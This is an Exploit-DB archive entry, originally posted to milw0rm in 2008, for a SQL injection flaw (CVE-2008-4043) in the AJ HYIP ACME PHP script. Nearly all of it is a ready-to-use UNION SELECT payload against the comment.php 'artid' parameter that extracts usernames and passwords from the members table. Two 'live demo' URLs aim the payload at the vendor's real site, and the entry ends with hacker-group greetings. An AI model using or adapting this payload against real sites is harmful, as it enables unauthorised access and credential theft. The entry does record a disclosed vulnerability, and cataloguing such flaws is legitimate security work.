AJ HYIP ACME comment.php artid SQL Injection Vulnerability

2008-09-02T00:00:00
ID EDB-ID:6350
Type exploitdb
Reporter security fears team
Modified 2008-09-02T00:00:00

Description

AJ HYIP ACME (comment.php artid) SQL Injection Vulnerability. CVE-2008-4043. Webapps exploit for php platform

                                        
                                            #################################################################################################
####################################  proud to be muslim   ######################################
###                                                                                           ###
###                            rEm0te sql injction VulnErability                              ###
###                                                                                           ###
###                                (ajhyip manager script)                                ###
###                                                                                           ###
#################################################################################################
#################################################################################################
###                                                                                           ###
### AuTh0r : security fears team                                                              ###
###                                                                                           ###
### Home   : WwW.alsonaa.com                                                                  ###
###                                                                                           ###    
### members: HeB4RieH , germaya_x                                                             ###
###                                                                                           ###
#################################################################################################
#################################################################################################
###                                                                                           ###
### Script Name : ajhyip                                                                      ###
###                                                                                           ###
### download    : http://www.ajhyip.com/                                                      ###
###                                                                                           ###
### Email       : s-fteam@securityfears.cc                                                    ###
#################################################################################################
#################################################################################################
###                                                                                           ###
### d0rk ::  "use your mind"                                                                  ###
### (you can log to control panel from http://site.com login.php)                             ###
###                                                                                           ###
### -(:: sql Code ::)-                                                                        ###
###        comment.php?artid=(sql)                                                            ###
###(sql)=5+union+select+1,concat_ws(0x3a3a,username,password),3,4,5,6,7,8,9+from+members/*    ###               
###                                                                                           ###
#################################################################################################
###                                                                                           ###
### -(::  l!ve demo ::)-                                                                      ###
###                                                                                           ###
###http://www.ajhyip.com/demo/prime/article/comment.php?artid=5+union+select+1,2,3,4,concat_ws(0x3a3a,username,password),6,7,8,9+from+members/*
###                                                                                           ###
###http://www.ajhyip.com/demo/acme/article/comment.php?artid=5+union+select+1,2,3,4,concat_ws(0x3a3a,username,password),6,7,8,9+from+members/*              
########################                                                    #####################
########################                                                    #####################
#################################################################################################
#################################################################################################
                                   -(:: !GreTzZ! ::)-
 ::SnIpEr.KiLLeR::fa6al error::black cheetah::members of alsonaa.com::str0ke::MusliMs HaCkErs:: 
#################################################################################################
#################################################################################################

# milw0rm.com [2008-09-02]